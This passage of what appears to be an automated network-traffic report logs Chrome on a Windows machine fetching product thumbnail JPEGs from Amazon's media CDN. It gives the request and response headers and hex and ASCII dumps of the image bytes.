                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC12792INData Raw: a5 e1 ef f3 63 ad c7 ad af e8 74 67 47 bb b3 c3 67 c9 c4 4b 04 a0 1d ce 84 b3 4f b7 b6 14 09 a6 dd 32 c5 90 02 80 28 01 40 09 41 41 28 00 00 00 3b dd dd 7e c7 17 17 37 17 5b bd c1 d3 da 75 5d fc 38 35 16 6c b7 9a 9e e7 43 bb d4 ec 76 fb 77 8f cd e9 7a ae 2f 63 8f 0f 5f 5f a9 9d 0e 6e 0e a7 d1 75 5d ae a7 6b 93 8c 00 96 58 a7 73 5e 00 01 65 00 cb 1c 80 a0 0b 0a 00 00 02 80 00 00 16 2c b1 65 95 14 8a 02 57 b3 ed e8 ba 4c f7 bd fd 03 b1 a8 f0 79 73 f6 bd 37 7b 6b cb 8f 98 dc 72 f9 3f 13 c3 f4 dc f4 dd 3d b6 a7 b3 9a 51 00 07 73 a0 12 a2 ca 01 65 94 19 31 c8 0b 14 00 2c a0 00 0a 25 94 00 04 a0 00 00 00 2f be da eb f5 be 3b 4d e8 7d 47 8e fa 2f 26 af 49 aa f2 7b dd c6 c7 7d b7 e3 f0 d9 73 7c cf 79 d4 e5 f4 3a 5e c7 36 39 04 00 03 b7 d0 00 05 21 40 05 01 90 50
                                                                                                                                                                                                                                                                      Data Ascii: ctgGgKO2(@AA(;~7[u]85lCvwz/c__nu]kXs^e,eWLys7{kr?=Qse1,%/;M}G/&I{}s|y:^69!@P
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC14297INData Raw: e6 5c 96 51 a2 15 b7 43 14 11 a1 ea aa 03 53 47 13 f5 1f dd 55 53 d5 1f de e9 61 11 bc b2 28 25 06 6a 59 63 9f 89 28 c6 63 01 43 8b f9 e5 8a 28 61 89 82 8c 31 2b c3 8c 92 ea 66 0b 81 d1 bc 6a e5 79 bc 4e 01 e1 04 66 62 3b 70 48 d9 e5 19 d2 32 0b 5c 89 6e 23 32 ab 18 e7 18 6a 9d e0 d0 8e 02 fc 99 c0 6f a4 5d 7b 54 df a8 f5 27 cd 3f e5 35 27 ad 37 e6 8e b0 32 48 03 27 a9 f4 49 ea 1f ed 52 95 c4 9a c6 46 46 d1 0d 1e a9 ca 1d c0 f4 2f ae ff 00 e3 f1 2e d8 88 b4 8e ae 71 51 c8 42 e2 36 d0 be 2f 1c 76 f2 fa cd 29 6f 79 b3 b6 fe b0 68 41 6c 87 29 cc 42 3c 43 30 93 4b 9d 59 19 47 fa 0d a9 51 75 11 62 00 0c 09 28 f1 c8 32 8c ac 3d fb 56 d5 b7 d9 45 50 fa ca a6 b6 c6 db 7d 94 d2 22 7a cc 16 95 d5 fd 56 0d e8 67 44 1d f6 03 34 25 85 88 0a e8 49 e8 29 e7 82 33 a5 dd
                                                                                                                                                                                                                                                                      Data Ascii: \QCSGUSa(%jYc(cC(a1+fjyNfb;pH2\n#2jo]{T'?5'72H'IRFF/.qQB6/v)oyhAl)B<C0KYGQub(2=VEP}"zVgD4%I)3
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC12792INData Raw: f7 2c 94 67 c0 04 01 e0 f6 43 ee c3 f7 25 ed 3e 61 73 2d 2d fe 14 d9 c9 a4 aa 05 18 4a 48 0b 80 a0 02 ed aa 81 85 81 1a 01 96 24 9f 24 de e0 19 e1 9b a3 f8 7d 95 1c 67 11 99 e0 8d cb bd 0a b5 e4 67 76 a8 1a 1c c5 0e 6a 00 d1 8b e4 7c 8a 17 c1 e9 d6 75 36 b7 9d ba 85 a0 e8 69 d1 18 e8 98 ec 8e 29 b9 1e aa 7c ad 05 84 63 03 98 b9 7b 48 68 72 7a 23 4d fb f0 01 1b 88 0c 1f 78 aa 02 44 70 20 a8 c1 73 90 7a 92 a0 04 b0 d9 60 a2 0d 26 01 0c 5c 94 45 c4 9a e8 50 f9 c6 45 ea d8 85 ed 8d da 92 4a 35 31 5e 4a 34 8b 85 0a 31 86 f1 2a e0 30 85 46 66 e0 93 81 53 ff 00 15 0b dc 5e f1 68 c4 97 63 f1 8d 00 17 94 28 47 8a 04 b8 7b f0 b0 82 d4 ce 4a 6c 2f cd 44 4b 1f f6 a2 ed 75 5a f5 9d 13 97 74 71 08 bb 6e 17 a7 93 e6 70 50 19 6e 2e 83 be bd 4b 3e 8f 99 b7 11 d1 18 61 ad
                                                                                                                                                                                                                                                                      Data Ascii: ,gC%>as--JH$$}ggvj|u6i)|c{Hhrz#MxDp sz`&\EPEJ51^J41*0FfS^hc(G{Jl/DKuZtqnpPn.K>a
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC7184INData Raw: ab db 24 2a 9c 16 8c ec 35 bc 10 00 80 5a 06 3d c2 4b 85 24 bf 3d 58 39 f9 71 52 9b db 09 36 9b b9 7b 06 66 60 56 28 19 36 76 73 8e f6 54 68 13 db 49 01 c0 2d dd 36 86 2d 28 3b 3e de cf b6 9e 34 5a e8 5a e8 f1 cc b9 fd af 41 23 bb 25 a2 bc 12 69 f3 b5 b4 4e d7 3f 98 d1 6d 60 02 aa df 17 57 c4 6e 08 12 86 d3 f1 12 b2 d3 25 3e c3 0d ca c2 c2 4f c7 b0 38 59 69 dc 60 67 03 a0 11 6b 65 1d dd a5 52 54 af 8b 40 b2 b0 73 67 dc 95 8d 85 4c 98 a0 b7 cf 66 09 f0 a8 23 1a bb e5 fa 18 af da 03 5c 00 3f 04 65 31 ef de cf e6 52 79 df a0 22 a0 ec 5f a9 70 7b c3 a6 4d e2 9e 07 1c 30 5a 58 c1 7c 3b 8c 07 bd 4b 18 a7 c9 48 b1 49 1b 97 19 20 12 cd d8 83 05 94 76 b9 52 28 1f 87 7c f7 87 bf 46 fa 78 d7 c7 46 d2 ff 00 1a 5c 17 0b e4 07 ee b4 48 60 7d 87 fd 9e ef ec ff 00 72 ff
                                                                                                                                                                                                                                                                      Data Ascii: $*5Z=K$=X9qR6{f`V(6vsThI-6-(;>4ZZA#%iN?m`Wn%>O8Yi`gkeRT@sgLf#\?e1Ry"_p{M0ZX|;KHI vR(|FxF\H`}r
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC12792INData Raw: 8a b6 d0 87 14 ae d1 cc 0c c4 47 71 a6 cc c3 bf 31 22 19 36 6b 7f 69 9a 46 32 bb 08 07 08 50 45 1e c9 1b d2 8e c2 3a 98 ab 3c dd 12 fe 20 48 54 23 7e f3 36 17 64 88 6e 6b 40 6a 83 b7 99 55 46 1c 03 0d 3b d4 24 e9 95 da 05 33 ef 1a 47 77 78 aa 98 82 fb 4d 95 58 e6 51 76 00 7d 91 b8 72 0a d0 2d 1a 19 b0 43 97 98 3a 48 f0 b9 e5 35 c8 e6 5e 1d 41 ed f6 bf 76 0d ca da 5b ad b6 cc a3 d5 61 05 01 6a 30 59 30 e2 e9 8f bb 8e dd 8f 11 74 c2 05 e1 12 e5 a9 52 3b 03 b3 88 89 06 2d 1b a1 f8 04 7c 77 60 68 64 a6 15 6f b5 c4 c0 0e e1 66 3d 99 8e ac f1 a3 a7 3d 59 99 97 2f d0 a1 c6 9e 74 f3 d5 e3 5c fa 04 be 8c fa 17 2e 5c bd 2f 33 7e 8b ad 6f d2 b9 8e 8b 35 b9 df a2 e7 f3 2e 59 a5 f5 b3 f3 a5 fa 57 a1 fe 3e d1 9e 75 df 6d 37 8d 65 11 ef 3c b8 f7 52 9a b0 59 8a eb b8 de
                                                                                                                                                                                                                                                                      Data Ascii: Gq1"6kiF2PE:< HT#~6dnk@jUF;$3GwxMXQv}r-C:H5^Av[aj0Y0tR;-|w`hdof==Y/t\.\/3~o5.YW>um7e<RY
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC5417INData Raw: e8 c7 77 a8 7e 71 ee d0 60 68 12 84 2c 75 26 b9 c0 5b 4b b6 0b ba 42 c1 66 74 64 c1 fa 79 df 46 3b bd 43 fc 0e 9e cc 0f 7f 93 55 45 83 89 1f ea 34 8d 34 92 b0 00 73 be 8c 77 7a 87 83 9b 0a cc c3 7f 14 88 8e b5 17 8b 26 27 59 3f 6d 3a f4 66 4f db e4 81 2e 0e 54 08 90 27 c8 32 4b 07 77 3b e8 c7 77 a8 95 87 03 1a c0 33 09 85 9c 98 15 13 13 b2 75 e8 cc a1 40 ea 75 4e 8c 9b f1 59 9f 97 92 25 52 18 3b b9 df 46 3b bd 45 cb f6 d0 28 2b a0 68 cc 69 cd ba 35 f3 de 8c 77 7a 8f 9e 8d 7e 40 43 01 fd 87 a3 1d de a3 0f ee 3d 18 ee f5 7b d1 8e ef 57 bd 18 ee f5 7b d1 8e ef 57 bd 18 ee f5 7b d1 8e ef 57 bd 18 ee f5 7b d1 8e ef 57 bd 18 ee f5 7b d1 8e ef 57 bc c1 dd ea f7 a3 1d de af 7a 31 dd ea f7 a3 1d de af 7f ff c4 00 2c 11 00 02 02 01 02 05 04 03 00 03 01 01 01 00 00
                                                                                                                                                                                                                                                                      Data Ascii: w~q`h,u&[KBftdyF;CUE44swz&'Y?m:fO.T'2Kw;w3u@uNY%R;F;E(+hi5wz~@C={W{W{W{W{Wz1,


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      53192.168.2.549781151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC611OUTGET /images/I/31qszhAmmGL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3506
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 35a35e33-3d90-4d52-9ebc-e7dc8b8b5b7c
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 21 Feb 2024 12:56:11 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 06:40:12 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 42490
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100082-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 06 02 03 04 05 07 01 08 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4,
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 00 f2 54 75 29 c0 9a 54 82 3e fe 70 52 64 12 7b 25 c0 ad 69 b3 49 5b cb 6c 3d 6d 7d 0c b7 25 4b f0 ec c4 49 4c 4a 93 61 93 07 12 ff 00 d3 b3 84 61 2f 5b 57 36 0b cf 37 4d c4 17 1b 64 56 19 37 98 aa bb 3e 81 22 dc c4 5b 79 f3 0f 14 2a 41 ba a7 57 e9 5e 8f e4 6b e3 f2 f4 71 d9 3a d4 9e 0a ab 1a c4 d0 4d 01 c9 4e bc 7d dc d6 02 b0 15 82 6b 0f 77 3f 09 ff c4 00 31 10 00 01 02 04 03 05 06 06 03 00 00 00 00 00 00 00 01 00 02 11 21 31 51 40 41 a1 03 12 30 61 71 32 52 81 91 92 c1 20 42 62 70 b1 d1 22 a2 f0 ff da 00 08 01 01 00 09 3f 02 fb 46 60 39 a7 53 5e 8a 5b d9 5b aa 70 c5 80 e1 1c d6 c8 2d 90 d7 9f 34 cd 4a da 39 86 26 51 de 6c a4 84 1d 91 c9 d8 8e 4b f9 43 c3 f2 9b a8 4d 3a 0f 74 0b 45 eb f8 8a cc bb 52 aa c9 85 98 18 ce eb 55 5e be 50 31 06 00 42 b3 4e 10
                                                                                                                                                                                                                                                                      Data Ascii: Tu)T>pRd{%iI[l=m}%KILJaa/[W67MdV7>"[y*AW^kq:MN}kw?1!1Q@A0aq2R Bbp"?F`9S^[[p-4J9&QlKCM:tERU^P1BN
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC750INData Raw: a7 00 ab 41 30 a1 c0 9d d5 c0 1b bf 85 e6 29 3d c3 06 62 ae b1 28 d2 9b 86 3e e7 c0 81 22 3c 3f 18 1e 94 1a 23 b4 45 a2 3d da c5 18 72 00 f1 be e1 0d 30 04 46 c4 72 23 d3 1f 92 aa 34 01 2c b1 27 1e e7 c3 87 fa 81 41 00 46 b0 af ce 62 5f d0 83 ff 00 02 59 34 78 c4 2d 44 96 24 bb 3c b7 d7 ee 71 18 40 4b 60 e9 78 df 76 1e ef 26 d3 9b 78 83 03 48 e2 11 ac 78 39 62 32 42 be c3 f1 04 06 ab ed ae 03 f5 cb a5 30 18 03 66 a6 09 2f 08 c1 41 5c 2b 17 0e c4 3a db c3 c0 cb 32 59 80 c8 54 a1 e2 e0 45 15 46 9b 86 88 4a 08 8e c5 a6 b9 5b 20 d4 64 02 b5 de 03 20 ac 6d 81 14 44 bb 93 0a 45 44 78 21 3c 0e 79 cc 04 aa 71 b6 e6 f9 4b 3b 86 51 9d fe 1d 20 bd 8a 7c 2a 95 46 d9 f9 86 a8 31 68 15 e3 f4 ca ae 39 9a b8 6a dd 2c bc 34 98 51 ab 09 14 ad 00 02 e6 83 fd df 3b db 59 af
                                                                                                                                                                                                                                                                      Data Ascii: A0)=b(>"<?#E=r0Fr#4,'AFb_Y4x-D$<q@K`xv&xHx9b2B0f/A\+:2YTEFJ[ d mDEDx!<yqK;Q |*F1h9j,4Q;Y


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      54192.168.2.549783151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC611OUTGET /images/I/31eMENCjajL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4007
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: cb386bc8-c326-425b-9852-ce67f5179c92
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 03 Oct 2023 08:50:08 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Mon, 18 Jul 2044 01:37:24 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1752157
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000177-IAD, cache-ewr-kewr1740020-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 08 03 07 09 02 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1378INData Raw: 53 d9 b2 ec ea e8 51 89 97 a4 2b b9 d3 25 a6 34 a7 33 3d da f2 f3 ec ca 71 df 91 89 a2 b1 a7 4d 4d d1 81 4d 0f 6c 3b 14 da a9 c8 de 97 dd 29 16 96 a1 0b 4c 63 9f 77 c5 3e f1 8c 4f 49 e1 59 ec f2 74 78 b2 70 62 d3 53 cf c2 b1 ef 49 69 0c 18 f8 fb b6 29 f7 6c 42 5a 67 19 17 69 95 2f 5b 32 f7 89 59 b4 da 7e 84 d9 85 f0 53 da cc fa 72 ac 89 b9 ae 94 81 d2 90 3a 52 07 4a 40 e9 48 1d 29 03 a5 20 74 a4 0e 94 81 d2 90 3a 52 07 4a 40 e9 38 1d 27 03 a4 e0 74 9c 0e 93 81 d2 70 2a fa 56 98 c9 39 78 fe ba ff c4 00 24 11 00 01 03 03 04 02 03 01 00 00 00 00 00 00 00 00 01 00 02 11 03 14 20 12 13 21 22 30 32 04 10 50 31 ff da 00 08 01 02 01 01 08 00 fd e6 51 d4 ad 0a b4 2a d5 5a 95 6a 55 b2 b7 28 7c 64 ea 5a 72 a3 ea 7c 01 55 fe 9c a8 fa 9f 00 4f 33 95 1f 53 91 fa 73 a0
                                                                                                                                                                                                                                                                      Data Ascii: SQ+%43=qMMMl;)Lcw>OIYtxpbSIi)lBZgi/[2Y~Sr:RJ@H) t:RJ@8'tp*V9x$ !"02P1Q*ZjU(|dZr|UO3Ss
                                                                                                                                                                                                                                                                      2024-08-21 18:28:43 UTC1251INData Raw: b4 4f 94 18 e6 25 31 6b 4a 17 6c 4a e8 8f 4f 06 24 97 0d 3c 5a 9c e9 32 c9 2e 44 b4 b1 2c f6 f7 a8 b6 20 69 a3 1d ef 22 11 29 53 f8 5b c8 7a 90 93 2f e1 95 0f 20 91 5c 36 2b e2 44 4e 48 73 63 58 5c a8 3c 55 88 01 64 50 bb dc 94 f6 c9 9e fa 38 ad be 45 29 88 2a ac b7 7b b2 43 92 0a 14 52 4a 15 ea ea 3f d0 c1 c7 21 d7 ba 19 9b 2e fd 16 3c 29 59 4c 05 bf 7f 0d e2 fa 3b fd ef 63 77 f2 12 76 be 8f 29 ae f3 03 36 7b 40 9e 09 93 54 6c 03 9b ce c9 7e 90 c2 0d 5f b4 6f 7e 66 e7 e4 2a a7 b4 bf 22 9f 03 d9 ce a2 70 3f 45 06 26 54 f0 b0 b1 b7 a3 a4 cb c3 d0 87 2b fc 9c 1c e0 e7 07 38 b9 c5 ce 2e 71 73 8b 9c 5c e2 e7 17 38 b9 c3 ce 1e 70 f3 85 9c 68 e3 42 93 4c a8 c4 92 42 ff 00 9d 7f ff c4 00 2a 10 01 00 02 00 03 07 05 00 02 03 00 00 00 00 00 00 01 00 11 21 31 51 30
                                                                                                                                                                                                                                                                      Data Ascii: O%1kJlJO$<Z2.D, i")S[z/ \6+DNHscX\<UdP8E)*{CRJ?!.<)YL;cwv)6{@Tl~_o~f*"p?E&T+8.qs\8phBLB*!1Q0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      55192.168.2.549788151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/31ihwTsvbBL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3695
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: c58bd094-d91d-450f-b9f5-dd02ee9b377c
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 12 Sep 2023 23:27:03 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 31 Jul 2044 06:12:39 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 682225
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200152-IAD, cache-ewr-kewr1740067-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 07 02 04 06 03 01 08 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 96 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: 00 00 00 00 00 01 02 11 30 03 10 12 21 31 50 22 41 ff da 00 08 01 02 01 01 08 00 fa 3e b1 f4 e8 b1 cd 8a 48 73 ec 4f 0b 64 52 ee d0 fd 3a 19 1c 2f 64 4f 53 ba 51 89 e1 07 85 ec 99 25 d8 a4 73 34 dd e1 7b 22 4b b6 5b 47 23 49 7e 70 bd bf 8c 71 25 04 35 46 9a a8 2c 2f 74 ad 12 74 2d 27 27 64 7c c2 f6 47 8e b6 64 3c c2 e2 53 12 1c 6c e2 c7 06 c4 be 1f ff c4 00 24 11 00 02 02 01 02 07 01 01 01 00 00 00 00 00 00 00 01 02 00 03 11 04 30 10 12 13 21 22 31 32 50 41 42 ff da 00 08 01 03 01 01 08 00 fd 1f 95 0d 11 15 d0 34 6a f0 dc b0 69 93 19 26 a7 c9 c2 50 0a f9 5b 48 03 23 62 95 05 30 6d 7b 15 c0 46 fa 58 7e 04 20 c4 69 77 ad 94 38 51 3a 86 1f 62 69 74 8b d3 0e f6 ea 31 d8 12 ae 7b ea 57 00 6c a9 f1 1c 0f f9 95 db e0 16 5b 49 3d e0 d3 1c cd 62 e1 40 d9 5f 91 07
                                                                                                                                                                                                                                                                      Data Ascii: 0!1P"A>HsOdR:/dOSQ%s4{"K[G#I~pq%5F,/tt-''d|Gd<Sl$0!"12PAB4ji&P[H#b0m{FX~ iw8Q:bit1{Wl[I=b@_
